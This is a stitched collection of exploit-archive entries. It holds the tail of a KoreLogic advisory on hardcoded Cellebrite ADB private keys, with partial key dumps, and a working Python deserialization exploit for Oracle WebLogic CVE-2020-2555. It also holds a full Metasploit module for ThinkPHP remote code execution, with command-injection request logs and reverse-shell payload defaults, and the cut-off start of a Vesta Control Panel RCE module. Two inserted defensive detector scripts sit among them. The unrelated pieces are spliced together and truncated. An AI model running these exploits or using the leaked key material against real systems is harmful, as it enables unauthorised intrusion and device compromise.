?PrivateKey3@ADBAuth@@0QBEB
1006cec8 07 ?? 07h
1006cec9 02 ?? 02h
1006ceca 00 ?? 00h
1006cecb 00 ?? 00h
1006cecc 00 ?? 00h
1006cecd a4 ?? A4h
1006cece 00 ?? 00h
1006cecf 00 ?? 00h
1006ced0 52 ?? 52h R
1006ced1 53 ?? 53h S
1006ced2 41 ?? 41h A
1006ced3 32 ?? 32h 2
...


A fourth key can be found within the KnockoutNG EPR file but
exists in the normally used PEM format:

00000000 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 |-----BEGIN RSA P|
00000010 52 49 56 41 54 45 20 4b 45 59 2d 2d 2d 2d 2d 0a |RIVATE KEY-----.|
00000020 4d 49 49 45 70 51 49 42 41 41 4b 43 41 51 45 41 |MIIEpQIBAAKCAQEA|
00000030 75 74 72 41 62 39 37 43 74 4e 6e 6d 2b 57 53 5a |utrAb97CtNnm+WSZ|
00000040 7a 52 6b 2b 53 61 6c 50 32 6c 68 47 48 62 37 35 |zRk+SalP2lhGHb75|
...

Once extracted, the keys can be converted into PEM using the
openssl binary and are then available for use by the stock
Android adb client.

$ ls -la
total 36
drwxr-xr-x 1 level level 346 Oct 19 07:04 .
drwxr-xr-x 1 level level 2842 Oct 13 09:32 ..
-rw------- 1 level level 1671 Sep 10 06:56 cellebrite_adb_key1
-rw-r--r-- 1 level level 717 Sep 10 06:56 cellebrite_adb_key1.pub
-rw------- 1 level level 1679 Sep 10 06:55 cellebrite_adb_key2
-rw-r--r-- 1 level level 717 Sep 10 06:56 cellebrite_adb_key2.pub
-r--r--r-- 1 level level 1736 Oct 13 09:26 cellebrite_adb_key3
-r--r--r-- 1 level level 717 Oct 13 09:26 cellebrite_adb_key3.pub
-rw------- 1 level level 1679 Oct 18 15:44 cellebrite_adb_key4
-rw-r--r-- 1 level level 451 Oct 18 15:46 cellebrite_adb_key4.pub
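An added example, not from the advisory or from KoreLogic, that scans a binary for the two key encodings this section describes: the CryptoAPI PRIVATEKEYBLOB (BLOBHEADER followed by RSAPUBKEY with the "RSA2" magic, which is what the 07 02 00 00 00 a4 00 00 52 53 41 32 bytes in the listings above are) and the PEM header. It is the kind of check a vendor can run over its own build to catch CWE-321 before shipping. The image it scans is constructed with zeroed key material; `find_private_keys` and `build_sample` are hypothetical names.

```python
import re
import struct
from typing import Dict, List

# Layout of a CryptoAPI RSA private key blob (all fields little-endian):
#   BLOBHEADER  bType=0x07 (PRIVATEKEYBLOB), bVersion=0x02, reserved, aiKeyAlg=0x0000A400 (CALG_RSA_KEYX)
#   RSAPUBKEY   magic="RSA2", bitlen, pubexp
#   modulus, prime1, prime2, exponent1, exponent2, coefficient, privateExponent
BLOBHEADER = struct.Struct("<BBHI")
RSAPUBKEY = struct.Struct("<4sII")
PRIVATEKEYBLOB, CUR_BLOB_VERSION, CALG_RSA_KEYX = 0x07, 0x02, 0x0000A400
RSA2_MAGIC = b"RSA2"
PEM_MARKER = b"-----BEGIN RSA PRIVATE KEY-----"
PEM_END = b"-----END RSA PRIVATE KEY-----"


def privatekeyblob_size(bitlen: int) -> int:
    """Total bytes of a PRIVATEKEYBLOB for a bitlen-bit key: headers, modulus and
    private exponent (bitlen/8 each) plus the five CRT values (bitlen/16 each)."""
    return BLOBHEADER.size + RSAPUBKEY.size + 2 * (bitlen // 8) + 5 * (bitlen // 16)


def find_private_keys(data: bytes) -> List[Dict]:
    """Scan a binary image for embedded RSA private keys in CryptoAPI blob or PEM form."""
    hits = []
    for match in re.finditer(re.escape(RSA2_MAGIC), data):
        magic_off = match.start()
        hdr_off = magic_off - BLOBHEADER.size
        if hdr_off < 0 or magic_off + RSAPUBKEY.size > len(data):
            continue
        btype, version, _reserved, alg = BLOBHEADER.unpack_from(data, hdr_off)
        if (btype, version, alg) != (PRIVATEKEYBLOB, CUR_BLOB_VERSION, CALG_RSA_KEYX):
            continue  # "RSA2" inside unrelated data, or a blob with a different header
        _magic, bitlen, pubexp = RSAPUBKEY.unpack_from(data, magic_off)
        if bitlen % 16 or not 512 <= bitlen <= 16384:
            continue  # header-shaped garbage; real RSA blobs have sane key sizes
        hits.append({
            "offset": hdr_off,
            "format": "PRIVATEKEYBLOB",
            "bitlen": bitlen,
            "pubexp": pubexp,
            "complete": hdr_off + privatekeyblob_size(bitlen) <= len(data),
        })
    for match in re.finditer(re.escape(PEM_MARKER), data):
        hits.append({
            "offset": match.start(),
            "format": "PEM",
            "bitlen": None,
            "pubexp": None,
            "complete": PEM_END in data[match.start():],
        })
    return sorted(hits, key=lambda hit: hit["offset"])


def build_sample() -> bytes:
    """Constructed test image: filler, one 2048-bit blob with zeroed key material, a PEM stub."""
    header = BLOBHEADER.pack(PRIVATEKEYBLOB, CUR_BLOB_VERSION, 0, CALG_RSA_KEYX)
    pub = RSAPUBKEY.pack(RSA2_MAGIC, 2048, 65537)
    key_material = b"\x00" * (privatekeyblob_size(2048) - BLOBHEADER.size - RSAPUBKEY.size)
    pem = PEM_MARKER + b"\n(constructed placeholder, not a real key)\n" + PEM_END + b"\n"
    return b"filler" * 10 + header + pub + key_material + b"\x00" * 16 + pem


if __name__ == "__main__":
    for hit in find_private_keys(build_sample()):
        print(hit)
```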


4. Mitigation and Remediation Recommendation

The vendor has addressed this vulnerability in UFED v7.30 update
released March 3, 2020. Licensed users should update via the
MyCellebrite Portal. Release notes can be found at:


https://www.cellebrite.com/en/productupdates/ufed-and-ufed-infield-7-30-provides-new-support-for-smartphones-with-huawei-kirin-processor/


5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.


6. Disclosure Timeline

2019.12.12 - KoreLogic submits vulnerability details to Cellebrite.
2019.12.12 - Cellebrite acknowledges receipt.
2020.01.29 - Cellebrite informs KoreLogic that a remediation will
be implemented in the next scheduled release and asks
for coordinated disclosure following subsequent
customer updates. KoreLogic agrees.
2020.03.03 - Cellebrite releases UFED v7.30.
2020.03.04 - Cellebrite asks for disclosure to remain embargoed
for 2-4 weeks for existing customers to upgrade.
KoreLogic agrees.
2020.04.08 - CVE requested from MITRE.
2020.04.12 - MITRE assigns CVE-2020-11723.
2020.04.13 - KoreLogic public disclosure.


7. Proof of Concept

See section 3. Technical Description.


The contents of this advisory are copyright(c) 2020
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt


Oracle WebLogic Server 12.2.1.4.0 Remote Code Execution


Oracle WebLogic Server version 12.2.1.4.0 suffers from a remote code execution vulnerability.


MD5 | 5d69d5c98bbcd4cd93c6a276602730ae

# Exploit Title: Oracle WebLogic Server 12.2.1.4.0 - Remote Code Execution
# Author: nu11secur1ty
# Date: 2020-03-31
# Vendor: Oracle
# Software Link: https://download.oracle.com/otn/nt/middleware/12c/122140/fmw_12.2.1.4.0_wls_Disk1_1of1.zip
# Exploit link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-2555
# CVE: CVE-2020-2555


[+] Credits: Ventsislav Varbanovski (nu11secur1ty)
[+] Source: readme from GitHub


[Exploit Program Code]
--------------------------

#!/usr/bin/python
# @nu11secur1ty
import socket
import os
import sys
import struct

if len(sys.argv) < 4:
    print 'Usage: python %s <host> <port> </path/to/payload>' % os.path.basename(sys.argv[0])
    sys.exit()

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)

server_address = (sys.argv[1], int(sys.argv[2]))
print '[+] Connecting to %s port %s' % server_address
sock.connect(server_address)

# Send headers
headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
print 'sending "%s"' % headers
sock.sendall(headers)

data = sock.recv(1024)
print >>sys.stderr, 'received "%s"' % data

payloadObj = open(sys.argv[3],'rb').read()

payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00'
payload=payload+payloadObj
payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x5
4\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78'

payload=struct.pack('>I',len(payload)) + payload[4:]

print '[+] Sending payload...'
sock.send(payload)
data = sock.recv(1024)
print >>sys.stderr, 'received "%s"' % data


[Vendor]
Oracle


[Vulnerability Type]
Network Remote



[Description]
Vulnerability in the Oracle Coherence product of Oracle Fusion Middleware (component: Caching,CacheStore,Invocation).
Supported versions that are affected are 3.7.1.17, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.
Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle Coherence.
Successful attacks of this vulnerability can result in takeover of Oracle Coherence.
CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).


[Disclosure Timeline]
2019/12/10


[+] Disclaimer
The entry creation date may reflect when the CVE ID was allocated or reserved,
and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

[Video]
https://www.youtube.com/watch?v=59jt8rr8ECc

@nu11secur1ty


ThinkPHP 5.0.23 Remote Code Execution


This Metasploit module exploits one of two PHP injection vulnerabilities in the ThinkPHP web framework to execute code as the web user. Versions up to and including 5.0.23 are exploitable, though 5.0.23 is vulnerable to a separate vulnerability. The module will automatically attempt to detect the version of the software. Tested against versions 5.0.20 and 5.0.23 as can be found on Vulhub.


MD5 | e63e44c2cb033ac880ece4ae4c6a8e43

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'ThinkPHP Multiple PHP Injection RCEs',
      'Description' => %q{
        This module exploits one of two PHP injection vulnerabilities in the
        ThinkPHP web framework to execute code as the web user.

        Versions up to and including 5.0.23 are exploitable, though 5.0.23 is
        vulnerable to a separate vulnerability. The module will automatically
        attempt to detect the version of the software.

        Tested against versions 5.0.20 and 5.0.23 as can be found on Vulhub.
      },
      'Author' => [
        # Discovery by unknown threaty threat actors
        'wvu' # Module
      ],
      'References' => [
        # https://www.google.com/search?q=thinkphp+rce, tbh
        ['CVE', '2018-20062'], # NoneCMS 1.3 using ThinkPHP
        ['CVE', '2019-9082'], # Open Source BMS 1.1.1 using ThinkPHP
        ['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce'],
        ['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce']
      ],
      'DisclosureDate' => '2018-12-10', # Unknown discovery date
      'License' => MSF_LICENSE,
      'Platform' => ['unix', 'linux'],
      'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
      'Privileged' => false,
      'Targets' => [
        ['Unix Command',
          'Platform' => 'unix',
          'Arch' => ARCH_CMD,
          'Type' => :unix_cmd,
          'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat'}
        ],
        ['Linux Dropper',
          'Platform' => 'linux',
          'Arch' => [ARCH_X86, ARCH_X64],
          'Type' => :linux_dropper,
          'DefaultOptions' => {
            'CMDSTAGER::FLAVOR' => :curl,
            'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
          }
        ]
      ],
      'DefaultTarget' => 1,
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'Reliability' => [REPEATABLE_SESSION],
        'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
      }
    ))

    register_options([
      Opt::RPORT(8080),
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])

    register_advanced_options([
      # NOTE: You may want to tweak this for long-running commands like find(1)
      OptFloat.new('CmdOutputTimeout',
                   [true, 'Timeout for cmd/unix/generic output', 3.5])
    ])

    # XXX: https://github.com/rapid7/metasploit-framework/issues/12963
    import_target_defaults
  end

=begin
wvu@kharak:~$ curl -vs "http://127.0.0.1:8080/index.php?s=$((RANDOM))" | xmllint --html --xpath 'substring-after(//div[@class = "copyright"]/span[1]/text(), "V")' -
* Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> GET /index.php?s=1353 HTTP/1.1
> Host: 127.0.0.1:8080
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 404 Not Found
< Date: Mon, 13 Apr 2020 06:42:15 GMT
< Server: Apache/2.4.25 (Debian)
< X-Powered-By: PHP/7.2.5
< Content-Length: 7332
< Content-Type: text/html; charset=utf-8
<
{ [7332 bytes data]
* Connection #0 to host 127.0.0.1 left intact
5.0.20wvu@kharak:~$
=end
  def check
    # An unknown route will trigger the ThinkPHP copyright with version
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'vars_get' => {'s' => rand_text_alpha(8..42)}
    )

    unless res
      return CheckCode::Unknown('Target did not respond to check request.')
    end

    unless res.code == 404 && res.body.match(/copyright.*ThinkPHP/m)
      return CheckCode::Unknown(
        'Target did not respond with ThinkPHP copyright.'
      )
    end

    # Get the first copyright <span> containing the version
    version = res.get_html_document.at('//div[@class = "copyright"]/span')&.text

    # The <span> may be missing even when the copyright text matched, so keep
    # the whole chain nil-safe instead of calling #scan on nil
    unless (version = version&.scan(/^V([\d.]+)$/)&.flatten&.first)
      return CheckCode::Detected(
        'Target did not respond with ThinkPHP version.'
      )
    end

    # Make the parsed version a comparable ivar for automatic exploitation
    @version = Gem::Version.new(version)

    if @version <= Gem::Version.new('5.0.23')
      return CheckCode::Appears("ThinkPHP #{@version} is a vulnerable version.")
    end

    CheckCode::Safe("ThinkPHP #{@version} is NOT a vulnerable version.")
  end

  def exploit
    # NOTE: Automatic check is implemented by the AutoCheck mixin
    super

    # This is just extra insurance in case I screwed up the check method
    unless @version
      fail_with(Failure::NoTarget, 'Could not detect ThinkPHP version')
    end

    print_status("Targeting ThinkPHP #{@version} automatically")

    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      # XXX: Only opts[:noconcat] may induce responses from the server
      execute_cmdstager
    else # This is just extra insurance in case I screwed up the info hash
      fail_with(Failure::NoTarget, "Could not select target #{target['Type']}")
    end
  end

  def execute_command(cmd, _opts = {})
    vprint_status("Executing command: #{cmd}")

    if @version < Gem::Version.new('5.0.23')
      exploit_less_than_5_0_23(cmd)
    elsif @version == Gem::Version.new('5.0.23')
      exploit_5_0_23(cmd)
    else # This is just extra insurance in case I screwed up the exploit method
      fail_with(Failure::NoTarget, "Could not target ThinkPHP #{@version}")
    end
  end

=begin
wvu@kharak:~$ curl -gvs "http://127.0.0.1:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id" | head -1
* Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1
> Host: 127.0.0.1:8080
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Mon, 13 Apr 2020 06:43:45 GMT
< Server: Apache/2.4.25 (Debian)
< X-Powered-By: PHP/7.2.5
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=UTF-8
<
{ [60 bytes data]
* Connection #0 to host 127.0.0.1 left intact
uid=33(www-data) gid=33(www-data) groups=33(www-data)
wvu@kharak:~$
=end
  def exploit_less_than_5_0_23(cmd)
    # XXX: The server may block on executing our payload and won't respond
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'vars_get' => {
        's' => '/Index/\\think\\app/invokefunction',
        'function' => 'call_user_func_array',
        'vars[0]' => 'system', # TODO: Debug ARCH_PHP
        'vars[1][]' => cmd
      },
      'partial' => true
    }, datastore['CmdOutputTimeout'])

    return unless res && res.code == 200

    vprint_good("Successfully executed command: #{cmd}")

    return unless datastore['PAYLOAD'] == 'cmd/unix/generic'

    # HACK: Print half of the doubled-up command output
    vprint_line(res.body[0, res.body.length / 2])
  end

=begin
wvu@kharak:~$ curl -vsd "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id" http://127.0.0.1:8081/index.php?s=captcha | head -1
* Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8081 (#0)
> POST /index.php?s=captcha HTTP/1.1
> Host: 127.0.0.1:8081
> User-Agent: curl/7.54.0
> Accept: */*
> Content-Length: 72
> Content-Type: application/x-www-form-urlencoded
>
} [72 bytes data]
* upload completely sent off: 72 out of 72 bytes
< HTTP/1.1 200 OK
< Date: Mon, 13 Apr 2020 06:44:05 GMT
< Server: Apache/2.4.25 (Debian)
< X-Powered-By: PHP/7.2.12
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=UTF-8
<
{ [60 bytes data]
* Connection #0 to host 127.0.0.1 left intact
uid=33(www-data) gid=33(www-data) groups=33(www-data)
wvu@kharak:~$
=end
  def exploit_5_0_23(cmd)
    # XXX: The server may block on executing our payload and won't respond
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'vars_get' => {'s' => 'captcha'},
      'vars_post' => {
        '_method' => '__construct',
        'filter[]' => 'system', # TODO: Debug ARCH_PHP
        'method' => 'get',
        'server[REQUEST_METHOD]' => cmd
      },
      'partial' => true
    }, datastore['CmdOutputTimeout'])

    return unless res && res.code == 200

    vprint_good("Successfully executed command: #{cmd}")

    return unless datastore['PAYLOAD'] == 'cmd/unix/generic'

    # Clean up output from cmd/unix/generic
    vprint_line(res.body.gsub(/\n<!DOCTYPE html>.*/m, ''))
  end

end
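Added example (not part of the Metasploit module or of the original post): a detector for the two request shapes the module sends, run over constructed Apache combined-log lines. The function names `thinkphp_indicators` and `scan_access_log` are mine, and the sample log lines and POST body are constructed for the example. The second variant is only visible where a reverse proxy or WAF audit log records POST bodies; an ordinary access log shows just `POST /index.php?s=captcha`, which on its own is not enough to flag.

```python
import re
from urllib.parse import unquote_plus

# Apache/nginx "combined" format; only the fields we need are named.
COMBINED_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample input: one benign probe, the < 5.0.23 GET variant, and the
# 5.0.23 POST variant as it appears in an access log (no body).
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [13/Apr/2020:06:42:15 +0000] "GET /index.php?s=1353 HTTP/1.1" 404 7332 "-" "curl/7.54.0"
10.0.0.5 - - [13/Apr/2020:06:43:45 +0000] "GET /index.php?s=/Index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1" 200 60 "-" "curl/7.54.0"
10.0.0.9 - - [13/Apr/2020:06:44:05 +0000] "POST /index.php?s=captcha HTTP/1.1" 200 60 "-" "curl/7.54.0"
"""

# Constructed body as a WAF/proxy audit log would record it for the third line.
SAMPLE_POST_BODY = "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id"


def thinkphp_indicators(method, target, body=""):
    """Return the ThinkPHP RCE indicators present in one HTTP request.

    `target` is the request-target (path plus query string); `body` is the
    raw POST body if the log source has it, otherwise empty.
    """
    hits = []
    query = unquote_plus(target.split("?", 1)[1]) if "?" in target else ""
    q = query.lower()

    # Variant 1 (< 5.0.23): the `s` route parameter names a controller in the
    # \think\ namespace and asks it to invoke an arbitrary function.
    if "\\think\\" in q and "invokefunction" in q:
        hits.append("thinkphp-invokefunction-route")
    if "function=call_user_func_array" in q:
        hits.append("call_user_func_array-in-query")

    # Variant 2 (5.0.23): POST to ?s=captcha whose body overrides the HTTP
    # method with `_method=__construct` and injects a `filter[]` callback.
    b = unquote_plus(body).lower()
    if method == "POST" and "_method=__construct" in b:
        hits.append("method-override-construct")
        if "filter[]=" in b:
            hits.append("filter-callback-injection")
    return hits


def scan_access_log(text):
    """Parse combined-format lines; return (ip, target, indicators) per flagged request."""
    findings = []
    for line in text.splitlines():
        m = COMBINED_LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        indicators = thinkphp_indicators(m["method"], m["target"])
        if indicators:
            findings.append((m["ip"], m["target"], indicators))
    return findings


if __name__ == "__main__":
    for ip, target, ind in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"{ip} {target} -> {', '.join(ind)}")
    print("with body:", thinkphp_indicators("POST", "/index.php?s=captcha", SAMPLE_POST_BODY))
```

Percent-decoding before matching matters: the `\` in `\think\app` is normally logged as `%5C`, so a pattern applied to the raw line would miss it.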

Vesta Control Panel Authenticated Remote Code Execution


This Metasploit module exploits an authenticated command injection vulnerability in the v-list-user-backups bash script file in Vesta Control Panel to gain remote code execution as the root user.


MD5 | 33bd5dbc2ecccd00ba2b6203d75e3317

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Ftp
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer

  def initialize(info={})
    super(update_info(info,
      'Name' => "Vesta Control Panel Authenticated Remote Code Execution",
      'Description' => %q{
        This module exploits an authenticated command injection vulnerability in the v-list-user-backups
        bash script file in Vesta Control Panel to gain remote code execution as the root user.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
        ],
      'References' =>
        [
          ['URL', 'https://pentest.blog/vesta-control-panel-second-order-remote-code-execution-0day-step-by-step-analysis/'],
          ['CVE', '2020-10808']
        ],
      'DefaultOptions' =>
        {
          'SSL' => true,
          'WfsDelay' => 300,
          'Payload' => 'python/meterpreter/reverse_tcp'
        },
      'Platform' => ['python'],
      'Arch' => ARCH_PYTHON,
